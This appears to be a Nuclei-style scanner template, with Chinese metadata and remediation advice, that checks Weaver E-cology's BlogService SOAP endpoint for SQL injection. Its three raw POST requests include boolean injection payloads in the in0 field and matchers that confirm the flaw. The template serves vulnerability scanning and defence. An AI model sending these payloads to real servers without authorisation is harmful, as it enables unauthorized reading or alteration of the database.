id: Ecology-sqli-BlogService
info:
  name: 泛微 E-cology BlogService注入漏洞
  author:
  - 折跃
  description: |-
    泛微 E-cology BlogService SQL注入漏洞
    泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台，e-cology可形成一系列的通用解决方案和行业解决方案。

    泛微 E-cology中存在SQL注入漏洞，攻击者可利用该漏洞执行SQL语句，对数据库中的信息进行查看、添加、修改或删除。
  severity: high
  remediation: |-
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：
    https://www.weaver.com.cn/

    临时修复方案：
    1、使用预编译语句，使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口，参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口，使用此接口可以非常有效的防止SQL注入攻击。
    2、对进入数据库的特殊字符（’”<>&*;等）进行转义处理，或编码转换。
    3、确认每种数据的类型，比如数字型的数据就必须是数字，数据库中的存储字段必须对应为int型。
    4、数据长度应该严格规定，能在一定程度上防止比较长的SQL注入语句无法正确执行。
    5、网站每个数据层的编码统一，建议全部使用UTF-8编码，上下层编码不一致有可能导致一些过滤模型被绕过。
    6、严格限制网站用户的数据库的操作权限，给此用户提供仅仅能够满足其工作的权限，从而最大限度的减少注入攻击对数据库的危害。
    7、避免网站显示SQL错误信息，比如类型错误、字段不匹配等，防止攻击者利用这些错误信息进行一些判断。
    8、过滤危险字符，例如：采用正则表达式匹配union、sleep、and、select、load_file等关键字，如果匹配到则终止运行。
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - body_1 == body_2
    - contains(body_3,'<deptName>')
  raw:
  - |
    POST /services/BlogService HTTP/1.1
    Host: {{Hostname}}
    Content-Type: text/xml
    Soapaction: ""

    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="webservices.blog.weaver.com.cn" xmlns:urn2="http://blog.weaver" xmlns:urn3="http://webservices.blog.weaver">
    <SOAP-ENV:Header/>
    <SOAP-ENV:Body>
      <urn:getMyAttentionList>
        <urn:in0></urn:in0>
      </urn:getMyAttentionList>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
  - |
    POST /services/BlogService HTTP/1.1
    Host: {{Hostname}}
    Content-Type: text/xml
    Soapaction: ""

    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="webservices.blog.weaver.com.cn" xmlns:urn2="http://blog.weaver" xmlns:urn3="http://webservices.blog.weaver">
    <SOAP-ENV:Header/>
    <SOAP-ENV:Body>
      <urn:getMyAttentionList>
        <urn:in0>-1 OR 1=1 AND 1=2</urn:in0>
      </urn:getMyAttentionList>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
  - |
    POST /services/BlogService HTTP/1.1
    Host: {{Hostname}}
    Content-Type: text/xml
    Soapaction: ""

    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="webservices.blog.weaver.com.cn" xmlns:urn2="http://blog.weaver" xmlns:urn3="http://webservices.blog.weaver">
    <SOAP-ENV:Header/>
    <SOAP-ENV:Body>
      <urn:getMyAttentionList>
        <urn:in0>-1 OR 1=1 AND 1=1</urn:in0>
      </urn:getMyAttentionList>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
  req-condition: true
variables:
  verify: '{{rand_text_alphanumeric(32,"")}}'
